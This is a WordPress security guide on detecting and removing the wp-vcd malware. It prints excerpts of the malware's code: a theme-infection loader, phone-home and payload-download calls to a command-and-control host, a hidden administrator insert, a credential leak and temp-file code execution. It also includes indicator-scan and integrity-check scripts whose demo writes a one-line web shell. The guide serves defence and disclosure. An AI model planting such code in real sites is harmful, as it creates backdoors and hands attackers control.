How To Secure wp-vcd.php Malware Attack In WordPress Websites And Stay Protected

Last Updated: 24th July, 2022

A few days back our own website was hit by this wp-vcd.php malware attack, all of a sudden. We took immediate steps to resolve the issue: we consulted our hosting provider, and then cleaned and secured the website with the help of the free versions of the Wordfence Security – Firewall & Malware Scan plugin and the Anti-Malware Security and Brute-Force Firewall plugin, along with some additional security measures described below.

So please do not implement, change or delete any files without reading the full article, and do NOT install every security plugin you come across unless you know what you are doing. Finally, always take a full backup (files and database) before you change anything. Let's now get into the "How To Secure wp-vcd.php Malware Attack In WordPress Websites And Stay Protected" guide.



1: What Is WordPress wp-vcd Malware and wp-vcd Malware Hack?

Recently we observed a newer strain of malware infecting WordPress websites by exploiting flaws in outdated themes and plugins. The wp-vcd malware creates backdoor access to the website by adding hidden WordPress administrator users. Some variants of the malicious code have also been seen to modify WordPress core files and to drop new files into the installation's /wp-includes directory.

  • The wp-vcd malware injects spam URLs into the website (also referred to as URL injection).
  • The malware creates a backdoor entry point which lets the attackers keep access to the website for a long time, even after the visible payload is removed.
  • Attackers abuse vulnerabilities in WordPress themes and plugins to upload the wp-vcd malware onto exposed websites.

Such a hack can largely be avoided by putting a Web Application Firewall (WAF) in front of the site (Sucuri and Wordfence both offer one) and by running regular malware scans; Sucuri SiteCheck is a free remote scanner, but note that it only inspects the rendered site and cannot see backdoor files on disk. It is also essential to check for any modification of WordPress core files, themes and plugins, for example by comparing them against the official copies.



2: The top reasons responsible for the wp-vcd malware hack

  • The most widely recognised cause of the hack is the use of a nulled theme: the wp-vcd malware usually comes pre-bundled with themes downloaded from nulled-theme websites.
  • Outdated WordPress themes and plugins still running on the website.
  • No Web Application Firewall (WAF) in place to block hacking attempts.


3: What are the Signs and Symptoms of wp-vcd Malware?

    • A completely new WordPress administrator user has appeared out of the blue.
    • Your hosting provider may have suspended your WordPress hosting account because of the wp-vcd malware, to protect the other websites on the same server.
    • SEO spam, for example Japanese search results or a pharma-hack attack in Google search results, is another very common sign. Learn more about WordPress spam in search results and how to clean it up. The following is a screen capture of Google spam-indexed results:

wp-vcd.php Malware Attack in Google-Search Results

  • Unknown JavaScript code in the source of your website.
  • Pages of your website redirecting to obscure and shady websites.
  • Unknown PHP files in your installation's wp-includes folder which do not exist in the WordPress GitHub repository.
  • PHP files in your installation's wp-content/uploads directory and its sub-directories (uploads should contain media only, never executable PHP).


4: Scrutinising what the wp-vcd malware does

Within the theme you are using (and, as explained below, often in every other installed theme too), in the functions.php file, you might observe code like this:

<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>

This line includes the class.theme-modules.php file, which in turn installs the wp-vcd malware into the other themes already present on the server (active or not) and creates the various malicious files.

Below are the different code patterns of the malware's suspicious code:

Pattern 1

<?php
//install_code1
error_reporting(0);
ini_set('display_errors', 0);
DEFINE('MAX_LEVEL', 2);
DEFINE('MAX_ITERATION', 50);
DEFINE('P', $_SERVER['DOCUMENT_ROOT']);
$GLOBALS['WP_CD_CODE'] = 'PD9waHANCmVycm9y...(base64-encoded string of PHP code)...';
?>

Pattern 2

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
    // drop the downloaded payload into the active theme, falling back to the current directory
    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
        @file_put_contents('wp-tmp.php', $tmpcontent);
    }
}


Pattern 3

$install_code = 'c18615a1ef0e1cd813b388b4b6e29bcdc18615a1ef0e1cd813b388b4b6e29bcd[...]';
// per-site password derived from the host name and the wp-config.php AUTH_SALT
$install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
$install_code = str_replace('{$PASSWORD}', $install_hash, base64_decode($install_code));

Pattern 4

if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')) {
    // prepend the loader to every theme's functions.php that is not yet marked WP_V_CD,
    // then restore the old modification time so the change is not obvious
    if (strpos($content, 'WP_V_CD') === false) {
        $content = $install_code . $content;
        @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
        touch($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $time);
    } else {
        $ping = false;
    }
}

Pattern 5

// phones home with the host name and the per-site password, then writes the
// command-and-control supplied backdoor to wp-includes/class.wp.php
if ($ping) {
    $content = @file_get_contents('http://www.spekt[dot]cc/test[dot]php?host=' . $_SERVER['HTTP_HOST'] . '&password=' . $install_hash);
    @file_put_contents(ABSPATH . '/wp-includes/class.wp.php', file_get_contents('http://www.spekt[dot]cc/admin[dot]txt'));
}
if ($ping2) {
    $content = @file_get_contents('http://www.spekt[dot]cc/test[dot]php?host=' . $_SERVER['HTTP_HOST'] . '&password=' . $install_hash);
    @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.spekt[dot]cc/admin[dot]txt'));
    //echo ABSPATH . 'wp-includes/class.wp.php';
}

Pattern 6

// inserts the backdoor administrator directly into the users table with a
// back-dated registration time (2010) so it blends in with old accounts
$wpdb->query("INSERT INTO $wpdb->users (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES ('100011111', '100011111', '\$P\$c18615a1ef0e1cd813b388b4B6e29bcd.', '100011111', '[email protected]', '', '2010-06-07 00:00:00', '', '0', '100010010')");


Pattern 7

// leaks the Envato Market plugin's stored user name, API key and token to
// anyone who requests the page with a ?key= parameter
if (isset($_GET['key'])) {
    $options = get_option(EWPT_PLUGIN_SLUG);
    echo esc_attr($options['user_name'] . ':' . esc_attr($options['api_key']));
    echo esc_html(envato_market()->get_option('token'));
}

Pattern 8

// writes the downloaded PHP to a temp file and includes it: remote code
// execution without an eval() call for scanners to match on
function wp_temp_setupx($phpCode) {
    $tmpfname = tempnam(sys_get_temp_dir(), "wp_temp_setupx");
    $handle = fopen($tmpfname, "w+");
    fwrite($handle, "<?php\n" . $phpCode);
    fclose($handle);
    include $tmpfname;
    unlink($tmpfname);
    return get_defined_vars();
}
Pattern 9

// walks every published post and strips the spam <div> injected earlier so a new payload can be inserted
foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data) {
    $post_content = preg_replace('!<div id="' . $div_code_name . '">(.*?)</div>!s', '', $data['post_content']);
}

// attacker-controlled rewrite of the injected div name and the spam domain
$file = preg_replace('/' . $matcholddiv[1][0] . '/i', $_REQUEST['newdiv'], $file);
$file = preg_replace('/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file);

// stores attacker-supplied spam pages in a custom `datalist` table, driven entirely by $_REQUEST
if ($wpdb->query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/' . mysql_escape_string($_REQUEST['url']) . '", `title` = "' . mysql_escape_string($_REQUEST['title']) . '", `keywords` = "' . mysql_escape_string($_REQUEST['keywords']) . '", `description` = "' . mysql_escape_string($_REQUEST['description']) . '", `content` = "' . mysql_escape_string($_REQUEST['content']) . '", `full_content` = "' . mysql_escape_string($_REQUEST['full_content']) . '" ON DUPLICATE KEY UPDATE `title` = "' . mysql_escape_string($_REQUEST['title']) . '", `keywords` = "' . mysql_escape_string($_REQUEST['keywords']) . '", `description` = "' . mysql_escape_string($_REQUEST['description']) . '", `content` = "' . mysql_escape_string(urldecode($_REQUEST['content'])) . '", `full_content` = "' . mysql_escape_string($_REQUEST['full_content']) . '"'))


Pattern 10

if ( ! function_exists( 'wp_temp_setup' ) ) {
    // phones home with the full request URL and fetches the next-stage PHP from the C2 host
    $path = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
    if ($tmpcontent = @file_get_contents("http://www.spekt[dot]cc/codeX[dot]php?i=" . $path)) {
        // the fetched code is written to disk and executed (see Pattern 2 and Pattern 8)
    }
}

There may be more patterns, but each one needs to be understood carefully before you act on it.

As analysed above (Pattern 6), this code creates a new administrator user with the login 100011111 and the display name 100010010. The purpose of this backdoor administrator account is to make sure the attacker can still get into the website even after you delete the malicious code, so that the website can be attacked again at a later time. Deleting the files is therefore not enough: the rogue user has to go as well.


5: How to clean up the wp-vcd malware infection?

Scan for occurrences of the files/strings below on your server and inspect their contents. Make sure to run a diff check of each file against the corresponding file in the WordPress core GitHub repository or in the plugin/theme's official distribution. You can use either (or both) of the strategies below over SSH (Secure Shell) or from your IDE (Integrated Development Environment).

5.1: Strategy 1 – Scan for files on the server that are typically created or infected by the wp-vcd hack:

  1. wp-includes/wp-vcd.php
  2. wp-includes/wp-tmp.php
  3. wp-content/themes/*/functions.php (every theme installed on the server, active or not)
  4. class.theme-modules.php (inside each theme folder)
  5. class.wp.php (in wp-includes)
  6. admin.txt
  7. codexc.txt
  8. code1.php
  9. cookie.txt
  10. codeX.php
  11. test.php


5.2: Strategy 2 – Scan for string patterns that are found in infected malware files:

  1. $install_code
  2. tmpcontentx
  3. function wp_temp_setupx
  4. wp-tmp.php
  5. stripos($tmpcontent, $wp_auth_key)
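The following is an added example, not code from the original article: a read-only indicator scan that applies Strategy 1 (the known wp-vcd file names) and Strategy 2 (the code strings from the patterns in section 4) to a WordPress root, and additionally flags PHP files under wp-content/uploads (a symptom from section 3). It only reports and never deletes; review every hit by diffing it against the upstream copy before removing anything. It assumes POSIX sh, find and grep -E on Linux; the signature list is taken from this page, with the C2 host added in the defanged form the page uses (spekt[dot]cc) and in plain form. The demo tree it builds is constructed for the example.

```shell
#!/bin/sh
# Added example (not the article's own code): read-only wp-vcd indicator scan.

# Strategy 1: file names dropped by wp-vcd, looked up anywhere under the root.
WPVCD_NAMES="wp-vcd.php wp-tmp.php class.wp.php class.theme-modules.php admin.txt codexc.txt code1.php cookie.txt codeX.php test.php"

# Strategy 2: strings seen in infected PHP files (extended regular expression).
WPVCD_STRINGS='\$install_code|tmpcontentx|function wp_temp_setupx|wp-tmp\.php|stripos\(\$tmpcontent, \$wp_auth_key\)|WP_V_CD|spekt\[dot\]cc|spekt\.cc'

# scan_wp_root ROOT
# Prints one "TYPE<TAB>PATH" line per finding; returns 1 if anything was found,
# 0 if the tree looks clean. Nothing on disk is modified.
scan_wp_root() {
    root=$1
    hits=$(
        # known file names, whether in wp-includes, a theme folder or elsewhere
        for name in $WPVCD_NAMES; do
            find "$root" -type f -name "$name"
        done | while read -r f; do printf 'known-name\t%s\n' "$f"; done

        # code signatures in every .php file, inactive themes included
        find "$root" -type f -name '*.php' -exec grep -lE "$WPVCD_STRINGS" {} + 2>/dev/null |
            while read -r f; do printf 'signature\t%s\n' "$f"; done

        # uploads must never contain executable PHP
        if [ -d "$root/wp-content/uploads" ]; then
            find "$root/wp-content/uploads" -type f -name '*.php' |
                while read -r f; do printf 'php-in-uploads\t%s\n' "$f"; done
        fi
    )
    [ -n "$hits" ] || return 0
    printf '%s\n' "$hits"
    return 1
}

# make_demo_tree
# Builds a constructed WordPress-like tree in a temp dir: one clean theme, one
# "nulled" theme carrying the loader line and Pattern 3 strings, a dropped
# wp-includes/wp-vcd.php and a PHP file in uploads. Prints the tree's path.
make_demo_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/wp-includes" "$d/wp-content/uploads/2022/07" \
             "$d/wp-content/themes/clean-theme" "$d/wp-content/themes/nulled-theme"
    printf '<?php\nadd_action("init", "clean_theme_init");\n' \
        > "$d/wp-content/themes/clean-theme/functions.php"
    cat > "$d/wp-content/themes/nulled-theme/functions.php" <<'EOF'
<?php
if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php');
$install_code = 'c18615a1ef0e1cd813b388b4b6e29bcd';
$install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
EOF
    : > "$d/wp-content/themes/nulled-theme/class.theme-modules.php"
    : > "$d/wp-includes/wp-vcd.php"
    printf '<?php eval($_POST["c"]);\n' > "$d/wp-content/uploads/2022/07/x.php"
    printf '%s\n' "$d"
}

# Usage on a real site: scan_wp_root /var/www/html  (exit status 1 = findings).
demo=$(make_demo_tree)
if scan_wp_root "$demo"; then echo "no wp-vcd indicators"; else echo "wp-vcd indicators found (see above)"; fi
rm -rf "$demo"
```

A hit on a theme's functions.php is not proof by itself (a security plugin may legitimately reference these strings), which is why the scan prints and a human diffs; a hit in wp-includes or uploads almost always is.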


6: How to secure WordPress and stay protected from the Backdoor Hack?

  1. Build a simple but firm security strategy for your WordPress website:
    1. Clean – Make sure that your website files and the database are 100% clean and malware free. Replace core, themes and plugins with fresh official copies rather than patching infected files, and delete the backdoor administrator user (Pattern 6) from the database.
    2. Secure – Install a good Web Application Firewall (WAF), such as the Wordfence Security – Firewall & Malware Scan plugin, to block re-infection attempts. Also rotate all administrator passwords and the salts in wp-config.php: the malware derives its per-site password from AUTH_SALT (Pattern 3), so a cleaned site with the old salt is still known to the attacker.
    3. Monitor – Run regular malware scans and file-integrity checks to see whether any files or database entries have been altered.
  2. Delete any unused WordPress themes and plugins (even if they are disabled; the malware infects inactive themes too).
  3. Totally avoid nulled themes and plugins on your website.
  4. Regularly update the WordPress core files, plugins and themes.
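The "Monitor" step above is easiest to make concrete with a file-integrity baseline. The following is an added example, not the article's own code: it records a manifest of SHA-256 hashes right after the clean-up and, on each later run (from cron, say), reports every file that was added, removed or modified, which is exactly how a re-infected functions.php or a freshly dropped wp-includes/wp-vcd.php shows up between scans. It assumes POSIX sh, awk and GNU coreutils sha256sum (Linux); the demo site and the simulated re-infection are constructed for the example.

```shell
#!/bin/sh
# Added example (not the article's own code): SHA-256 baseline and change report.

# baseline_write ROOT MANIFEST: hash every file under ROOT into MANIFEST
# (one "hash  ./path" line per file, sorted by path for readable diffs)
baseline_write() {
    (cd "$1" && find . -type f -exec sha256sum {} + | LC_ALL=C sort -k 2) > "$2"
}

# baseline_check ROOT MANIFEST
# Prints "ADDED|MODIFIED|REMOVED<TAB>path" for each difference against MANIFEST;
# returns 1 if there is any difference, 0 if the tree still matches.
baseline_check() {
    current=$(mktemp)
    baseline_write "$1" "$current"
    changes=$(awk -F'  ' '
        NR == FNR  { old[$2] = $1; next }           # first file: the saved manifest
        !($2 in old) { print "ADDED\t" $2; next }   # present now, absent from baseline
        old[$2] != $1 { print "MODIFIED\t" $2 }     # hash changed
        { delete old[$2] }                          # seen: whatever is left is REMOVED
        END { for (p in old) print "REMOVED\t" p }
    ' "$2" "$current")
    rm -f "$current"
    [ -n "$changes" ] || return 0
    printf '%s\n' "$changes"
    return 1
}

# make_demo_site: constructed tiny tree standing in for a clean WordPress install
make_demo_site() {
    d=$(mktemp -d)
    mkdir -p "$d/wp-includes" "$d/wp-content/themes/my-theme"
    printf '<?php\n// core file\n' > "$d/wp-includes/load.php"
    printf '<?php\nadd_action("init", "my_theme_init");\n' > "$d/wp-content/themes/my-theme/functions.php"
    printf '%s\n' "$d"
}

# simulate_reinfection ROOT: append a Pattern 3 style line to the theme's
# functions.php and drop wp-includes/wp-vcd.php, as the malware would
simulate_reinfection() {
    printf '$install_code = "c18615a1ef0e1cd813b388b4b6e29bcd";\n' >> "$1/wp-content/themes/my-theme/functions.php"
    : > "$1/wp-includes/wp-vcd.php"
}

# Usage on a real site: baseline_write /var/www/html /root/wp-baseline.sha256
# after the clean-up, then baseline_check from cron and alert on exit status 1.
site=$(make_demo_site)
manifest=$(mktemp)
baseline_write "$site" "$manifest"
baseline_check "$site" "$manifest" && echo "baseline matches"
simulate_reinfection "$site"
baseline_check "$site" "$manifest" || echo "integrity violations found (see above)"
rm -rf "$site" "$manifest"
```

Keep the manifest outside the web root (and ideally off the server) so an attacker who gets write access cannot simply regenerate it, and regenerate it yourself after every legitimate update of core, themes or plugins.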


7: Conclusion and VILab India Ultimate WordPress Security Guide

Disinfecting a website infected with malware like this is not always simple, because once it is activated it tends to infect other parts of the website as well by implanting different kinds of malicious code.

Moreover, this particular malware also creates a backdoor which lets the bad actors keep control of your website. It is therefore vital to follow a sound security strategy: do a thorough analysis of the website first, and then remove the hack completely, backdoor account included. We strongly recommend that you follow our Ultimate WordPress Security Guide, where you will find 25+ tips and fixes to stay secure online.
